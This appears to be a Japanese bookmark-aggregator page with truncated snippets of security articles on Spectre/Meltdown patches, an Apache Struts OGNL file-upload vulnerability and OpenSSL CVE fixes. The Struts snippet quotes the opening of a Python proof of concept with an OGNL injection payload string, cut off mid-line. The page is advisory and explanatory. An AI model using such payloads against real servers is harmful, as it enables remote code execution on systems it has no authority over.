Deleted articles cannot be recovered. Draft of this article would be also deleted. Are you sure you want to delete this article?
Amazon Web Services ブログ プロセッサの投機的実行に関する調査の公開について 【日本語訳】日本時間 2018年02月14日19:30 関連する CVE: CVE-2017-5715, CVE-2017-5753, CVE-2017-5754 日本時間 2018年02月06日09:30 以下は本件に関するアップデートです。 Amazon Linux 用の更新されたカーネルは、Amazon Linux のリポジトリにて入手できます。2018年1月13日以降にデフォルトの Amazon Linux 設定で起動された EC2 インスタンスには自動的に最新のパッケージが含まれています。 最新のパッケージでは、 CVE-2017-5715 に対処するための安定版オープンソース Linux セキュリティの改善がカーネル内に組み込まれています。また 以前取り込まれた CVE-2017-
2018年1月3日にCPUに関連する3つの脆弱性情報が公開されました。報告者によるとこれらの脆弱性はMeltdown、Spectreと呼称されています。ここでは関連情報をまとめます。 脆弱性の概要 報告者が脆弱性情報を次の専用サイトで公開した。 Meltdown and Spectre (またはこちら) 3つの脆弱性の概要をまとめると次の通り。 脆弱性の名称 Meltdown Spectre CVE CVE-2017-5754(Rogue data cache load) CVE-2017-5753(Bounds check bypass) CVE-2017-5715(Branch target injection) 影響を受けるCPU Intel Intel、AMD、ARM CVSSv3 基本値 4.7(JPCERT/CC) 5.6(NIST) ←に同じ PoC 報告者非公開 論文中にx
またOGNL絡みの脆弱性が見つかりました。 アウトラインはid:Kango氏がまとめているこちらが参考になります。 http://d.hatena.ne.jp/Kango/20170307/1488907259 さて、この脆弱性の動作原理を調べてみました。 ファイルアップロード時のヘッダの処理方式に問題があるようです。 前述のURLで述べられているPoCはこんな感じ。 import requests import sys def poc(url): payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.
OpenSSL 1.1.0a より前のバージョン OpenSSL 1.0.2i より前のバージョン OpenSSL 1.0.1u より前のバージョン OpenSSL は、次の複数の脆弱性および処理を修正したアップデートをリリースしました。 OCSP Status Request にサービス運用妨害 (DoS) - CVE-2016-6304 (重要度:高) SSL_peek() 関数の呼出し処理にサービス運用妨害 (DoS) - CVE-2016-6305 (重要度:中) ブロック長が 64bit のブロック暗号に対する誕生日攻撃 (Sweet32) への緩和策 - CVE-2016-2183 (重要度:低) MDC2_Update() 関数の呼出し処理にヒープベースのバッファオーバーフロー - CVE-2016-6303 (重要度:低) SHA512 を使用した不正な形式の TLS セッ
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く